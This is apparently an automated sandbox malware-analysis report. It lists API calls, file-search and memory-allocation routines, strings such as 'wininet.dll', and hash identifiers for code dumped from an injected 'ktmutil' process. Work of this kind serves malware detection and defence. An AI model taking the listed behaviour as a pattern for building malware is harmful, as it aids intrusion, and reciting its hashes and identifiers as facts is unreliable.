NtClose 84488->84492 84489->84464 84490->84464 84491->84489 84493 3a7b93 84492->84493 84493->84464 84495 3a5b96 84494->84495 84497 3a5ba0 84494->84497 84495->84472 84496 3a5c86 84496->84472 84497->84496 84498 3b5180 2 API calls 84497->84498 84499 3a5d0c 84498->84499 84499->84472 84501 3a6685 84500->84501 84502 3a5f00 2 API calls 84501->84502 84503 3a66b9 84501->84503 84502->84503 84504 3a67d6 84503->84504 84505 3a6190 3 API calls 84503->84505 84504->84482 84506 3a674f 84505->84506 84507 3a675a 84506->84507 84508 3a6010 LdrInitializeThunk 84506->84508 84507->84482 84509 3a680d 84508->84509 84510 3a68c2 84509->84510 84512 3b9070 NtClose 84509->84512 84511 3a6190 3 API calls 84510->84511 84513 3a68d8 84511->84513 84517 3a6822 84512->84517 84514 3a6360 4 API calls 84513->84514 84516 3a68df 84513->84516 84515 3a691c 84514->84515 84515->84482 84516->84482 84518 3a6010 LdrInitializeThunk 84517->84518 84519 3a686d 84518->84519 84520 3b9070 NtClose 84519->84520 84521 3a6877 84520->84521 84522 3a6010 LdrInitializeThunk 84521->84522 84522->84510 84524 3b7c82 84523->84524 84526 3b7c8f 84524->84526 84527 3a1960 84524->84527 84526->84481 84543 3a7de0 84527->84543 84529 3a1980 84536 3a1ec4 84529->84536 84547 3b0dc0 84529->84547 84532 3a1b94 84534 3bc470 2 API calls 84532->84534 84533 3a19de 84533->84536 84550 3bc340 84533->84550 84537 3a1ba9 84534->84537 84535 3a7d80 LdrInitializeThunk 84539 3a1bf6 84535->84539 84536->84526 84537->84539 84555 3a0480 84537->84555 84539->84535 84539->84536 84540 3a0480 LdrInitializeThunk 84539->84540 84540->84539 84541 3a1d47 84541->84539 84542 3a7d80 LdrInitializeThunk 84541->84542 84542->84541 84544 3a7ded 84543->84544 84545 3a7e0e SetErrorMode 84544->84545 84546 3a7e15 84544->84546 84545->84546 84546->84529 84548 3bb0f0 NtAllocateVirtualMemory 84547->84548 84549 3b0de1 84547->84549 84548->84549 84549->84533 84551 3bc350 84550->84551 84552 3bc356 84550->84552 84551->84532 84553 3bb260 RtlAllocateHeap 84552->84553 84554 3bc37c 84553->84554 
84554->84532 84556 3a0496 84555->84556 84559 3b9310 84556->84559 84560 3b932d 84559->84560 84563 2e42c70 LdrInitializeThunk 84560->84563 84561 3a04a2 84561->84541 84563->84561 84564 3b0f81 84565 3b0f84 84564->84565 84577 3b8ec0 84565->84577 84567 3b0fa2 84568 3b0fc0 84567->84568 84569 3b0fd5 84567->84569 84570 3b9070 NtClose 84568->84570 84571 3b9070 NtClose 84569->84571 84572 3b0fc9 84570->84572 84574 3b0fde 84571->84574 84573 3b1015 84574->84573 84575 3bb180 RtlFreeHeap 84574->84575 84576 3b1009 84575->84576 84578 3b8f6a 84577->84578 84579 3b8eee 84577->84579 84580 3b8f80 NtReadFile 84578->84580 84579->84567 84580->84567 84581 3b8fc0 84582 3b903a 84581->84582 84584 3b8fee 84581->84584 84583 3b9050 NtDeleteFile 84582->84583

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: !$"$-[$/1$0n$3j$7$9$=$=y$?;$@J$I$K$Pa$T$V$WD$b$dM$u?$z($q$t$~
              • API String ID: 0-108677462
              • Opcode ID: 54297137325307ea6523086cb8941a21b4a288ae9b161d3f6d03a4f6ee694e65
              • Instruction ID: 587eb900efe3880e954fde60a1517ab1d80d4b40b226b358b1333050f1271e81
              • Opcode Fuzzy Hash: 54297137325307ea6523086cb8941a21b4a288ae9b161d3f6d03a4f6ee694e65
              • Instruction Fuzzy Hash: 43328FB0D05628CBEF25CF45C894BDDFBB2BB44308F1085DAD4096B281C7B95A89DF56
              APIs
              • FindFirstFileW.KERNELBASE(?,00000000), ref: 003AC354
              • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC38F
              • FindClose.KERNELBASE(?), ref: 003AC39A
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstNext
              • String ID:
              • API String ID: 3541575487-0
              • Opcode ID: 109021cd97ad8494effc6539568a49b3554d9e244c11c84696938d8e85b32137
              • Instruction ID: 2f85413b6d0c3e7c960d11fd9a87266d574ef22c852b6dd66d43962f96180ca6
              • Opcode Fuzzy Hash: 109021cd97ad8494effc6539568a49b3554d9e244c11c84696938d8e85b32137
              • Instruction Fuzzy Hash: C0316375900208BBEB22DF64CC86FFF777CEB45704F144558B918AB181DA74AA84CBA0
              APIs
              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 003B8E51
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 3aa1662ffb234809a80a3c7a6d824c6bcfbeb44a8c5fdfe23a266e5f422ffbc6
              • Instruction ID: 2169ac03b0d2093f63d2bc2b7e96d3f49871905d428d124687846f2e0dff948f
              • Opcode Fuzzy Hash: 3aa1662ffb234809a80a3c7a6d824c6bcfbeb44a8c5fdfe23a266e5f422ffbc6
              • Instruction Fuzzy Hash: 4431E7B1A00648AFDB14DF98D881EEE77B9EF8C314F108619F919A7340D730A801CBA1
              APIs
              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 003B8FA9
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: d3cdf02d8a8cf4b2e26f716c2950b15ece2f190f1681260e3066cae8aa6bae16
              • Instruction ID: 59cffe9e2f819cb3b622565a1123a6258d8dbfc9610fb392c279149c045d63f1
              • Opcode Fuzzy Hash: d3cdf02d8a8cf4b2e26f716c2950b15ece2f190f1681260e3066cae8aa6bae16
              • Instruction Fuzzy Hash: 8E31EAB5A00649AFDB14DF98D841EEFB7F9EF88314F108619F918AB340D770A911CBA1
              APIs
              • NtAllocateVirtualMemory.NTDLL(003A19DE,?,003B7C8F,00000000,00000004,00003000,?,?,?,?,?,003B7C8F,003A19DE), ref: 003B92AB
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b32a7c0d1dbbd573779880b42a4c6a8dd876dfe02e567570fb93f44313f231f4
              • Instruction ID: dc8f6ba19ef567d590da6c7444e812f16c74715843de58adcbfd8902994aa01f
              • Opcode Fuzzy Hash: b32a7c0d1dbbd573779880b42a4c6a8dd876dfe02e567570fb93f44313f231f4
              • Instruction Fuzzy Hash: 632159B1A00649ABDB14DF98DC41EEFB7B9EF88310F108509F918AB340D770A911CBA1
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 34eb003ce2ba49cb7e68d9d814fa4c122fd035dd9981de1c96b0e8b331ff87b6
              • Instruction ID: 187ce4303134ee58c586f6e9c8bcc37265b56ec60278316d9ffe6d9399575810
              • Opcode Fuzzy Hash: 34eb003ce2ba49cb7e68d9d814fa4c122fd035dd9981de1c96b0e8b331ff87b6
              • Instruction Fuzzy Hash: E411A371640709BED621EB58DC42FEB73ACEF85314F10850DFA48AB281EB71790187E1
              APIs
              • NtClose.NTDLL(003B1461,?,00000000,?,?,003B1461,?), ref: 003B90A4
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction ID: ac09139829e9af6c5305aa3946a490fcbaa62b2c4cdbf71012f37c3a476cef2e
              • Opcode Fuzzy Hash: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction Fuzzy Hash: D2E086722006047BD610EB5ADC41FDB77ACDFC5710F10851AFA0CAB142C671790487F0
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
              • Instruction ID: de4adcaf939503084f8ac32c93b4e5520659d8dd192d67363810d49fe544446a
              • Opcode Fuzzy Hash: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
              • Instruction Fuzzy Hash: F1900231655810129580B1584885547400597E0301B55D011F5424554D8A148A969761
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
              • Instruction ID: d49b404b698ab321a8aa007503ecf6f270b9fc898c1a566f7a88f493bb0f10a9
              • Opcode Fuzzy Hash: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
              • Instruction Fuzzy Hash: 9190023129141802D580B15884157070006C7D0601F55D011B5024554E86168AA5AAB1
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
              • Instruction ID: 01b9a5d2b1aaac6b69be5efa860ba05c684996f1e3978aee93320a42306f7ad3
              • Opcode Fuzzy Hash: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
              • Instruction Fuzzy Hash: FA9004717515104345C0F15C4C054077005D7F13013D5D115F5554570DC71CCDD5D77D
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
              • Instruction ID: 8ddb52af493d974aba51e569877f5ec692b5401a073d3d174acd856880b9c02f
              • Opcode Fuzzy Hash: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
              • Instruction Fuzzy Hash: B190023165551402D540B1584515707100587D0201F65D411B5424568E87958A91A9A2
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
              • Instruction ID: 7430fcb87b08cfbe4341acb694939783d7f9395a105ad5e266da872ce763d7c8
              • Opcode Fuzzy Hash: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
              • Instruction Fuzzy Hash: AE900235271410020585F558060550B044597D6351395D015F6416590DC62189A59721
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
              • Instruction ID: 251ae9d811fbd17e98c68ace60d38372bf7ce2dde12812c9d567fbb3458e4c4b
              • Opcode Fuzzy Hash: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
              • Instruction Fuzzy Hash: 55900435371410030545F55C07055070047C7D5351355D031F7015550DD731CDF1D531
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
              • Instruction ID: 7f89cf40f5fca90966a4aaccdec901e99702c161baa042320cdbed0142c798cf
              • Opcode Fuzzy Hash: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
              • Instruction Fuzzy Hash: F190023125545842D580B1584405A47001587D0305F55D011B5064694E96258E95FA61
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
              • Instruction ID: 6a8225363b81528f94c44baaa80ec54551e0ef4de0ad2f8b60bd1d3db92a6604
              • Opcode Fuzzy Hash: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
              • Instruction Fuzzy Hash: 0190023125141802D5C0B158440564B000587D1301F95D015B5025654ECA158B99BBA1
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
              • Instruction ID: 668a0f2438036db2999a35f5e676714e01b61c1d947be608baac6fe0c3a96cdb
              • Opcode Fuzzy Hash: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
              • Instruction Fuzzy Hash: E790023165541802D590B1584415747000587D0301F55D011B5024654E87558B95BAA1
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
              • Instruction ID: b0b60fe4b979c7fea876ed9c60e0ed6054512d1331405820750512e093d1e59e
              • Opcode Fuzzy Hash: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
              • Instruction Fuzzy Hash: D8900271252410034545B1584415617400A87E0201B55D021F6014590EC52589D1A525
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
              • Instruction ID: 319e1bc5156fcee079b5a70ddd470e4ed420759a900d335ae467d0ce43267086
              • Opcode Fuzzy Hash: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
              • Instruction Fuzzy Hash: 9090023129546102D590B15C44056174005A7E0201F55D021B5814594E85558995A621
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
              • Instruction ID: ce103228e5e62e6ba23f9f178d8e10b663a30249e37ca6b55b17a49742254964
              • Opcode Fuzzy Hash: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
              • Instruction Fuzzy Hash: CB90027125181403D580B5584805607000587D0302F55D011B7064555F8A298D91A535

              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: InitializeUninitialize
              • String ID: @J7<$S
              • API String ID: 3442037557-4024358435
              • Opcode ID: 46312136729c0ba2b3be9226c58ff8797c89a4e6330a31a1bef1864a8bae36a2
              • Instruction ID: a9dcb2f06cec2aa00c94ac73b2794743814781432e29889d94efb7131a47cf24
              • Opcode Fuzzy Hash: 46312136729c0ba2b3be9226c58ff8797c89a4e6330a31a1bef1864a8bae36a2
              • Instruction Fuzzy Hash: C7418275A0020A9FDB11DFD8D8809EEB7B9FF89304F108569E505EB210DB75EE058BA0

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: a4603B1g$a4603B1g
              • API String ID: 0-2302878989
              • Opcode ID: 488b4b0a9382001cd019393e18b8036ce6b19b9619084eb3f9cd61f5811cfba4
              • Instruction ID: e780a613fe2753670d73fcad35a9616cedacf0ef80cb7d4d17338efd1b2e0e75
              • Opcode Fuzzy Hash: 488b4b0a9382001cd019393e18b8036ce6b19b9619084eb3f9cd61f5811cfba4
              • Instruction Fuzzy Hash: 2B31DF37804668BFDB269E68DC82AEFB77CEE86324B14845DD9509F202C331590387D1

              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: 703255aff6cd644c4466bdeb7847e53112778643a3fcc44f36c3a0b4fb07142c
              • Instruction ID: 30e3ee9d2e2b9cf3eca6a1f25c5b270443afd542613d4f232650d78ad885e6d4
              • Opcode Fuzzy Hash: 703255aff6cd644c4466bdeb7847e53112778643a3fcc44f36c3a0b4fb07142c
              • Instruction Fuzzy Hash: 8C11E772D4010C7EEB129AD59C82EEFBB7CDB467A4F408069FA08AB141D6755E0647B1

              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: ae6c9a5930b31d02452092fab402e546b86e3583aa398619668558ca509229b8
              • Instruction ID: 3b0fedd0e8059c2c83b22071d526013e47045ecc4343f8d4ce9a0074cb8d3569
              • Opcode Fuzzy Hash: ae6c9a5930b31d02452092fab402e546b86e3583aa398619668558ca509229b8
              • Instruction Fuzzy Hash: 16118675D0021C7EDB12AAE58C81EEFBB7CEF46794F058064FA14AB141D6745E064BA1

              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: 42c4d09f60380a6ac578738a13915813b7865d36b66bf8fe4a57f401f169213c
              • Instruction ID: 73d7e0824c3b13c96fb5034d8c9cfaf483748d7cb5045a49b70e305401ec2984
              • Opcode Fuzzy Hash: 42c4d09f60380a6ac578738a13915813b7865d36b66bf8fe4a57f401f169213c
              • Instruction Fuzzy Hash: 8F019672D0021C7EEB12AAE58C82EEFBB7CDF45794F058064FA04BB141D6745E0647B1
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 003B383B
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 1b8a5507b2bc47722b8b04186d296f8692b5ee191683a2e1bcade8f1de106259
              • Instruction ID: 75017a4641fcd8d0925c99d63e9d42ddfc1bded95bdfeec8d8eecb0fbbc9b39e
              • Opcode Fuzzy Hash: 1b8a5507b2bc47722b8b04186d296f8692b5ee191683a2e1bcade8f1de106259
              • Instruction Fuzzy Hash: A03190B1A01605BBD715DFA4CC81FEBBBBCEB88704F04452CBA19AB241D7706B44CBA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: InitializeUninitialize
              • String ID: @J7<
              • API String ID: 3442037557-2016760708
              • Opcode ID: abf82f07030356be4ea017b53c2d500cfe6d3c00c1b5197d059ea6240ee9c545
              • Instruction ID: 5a508256c8cbcde0ab5d830a3adeb6a27d241d7afc23430d56ef5d090bfd503c
              • Opcode Fuzzy Hash: abf82f07030356be4ea017b53c2d500cfe6d3c00c1b5197d059ea6240ee9c545
              • Instruction Fuzzy Hash: 8D3130B9A0020A9FDB11DFD8C8809EFB7B9FF89304B108559E515EB214D775EE058BA0
              APIs
              • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC38F
              • FindClose.KERNELBASE(?), ref: 003AC39A
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFileNext
              • String ID:
              • API String ID: 2066263336-0
              • Opcode ID: 1d9af6178bdfa8e57f43223b8fd9c01c0db59e9dd846720bdd629a69318d5666
              • Instruction ID: 3fa2dfffa8db754ff4845a7523f45abd1106be2f6c589b351b15d1c02e01f579
              • Opcode Fuzzy Hash: 1d9af6178bdfa8e57f43223b8fd9c01c0db59e9dd846720bdd629a69318d5666
              • Instruction Fuzzy Hash: 90E0927661014CABCB12DBA09C44CEF777CEF85B15F0081C9F80996001D6358B449790
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A41F2
              Memory Dump Source
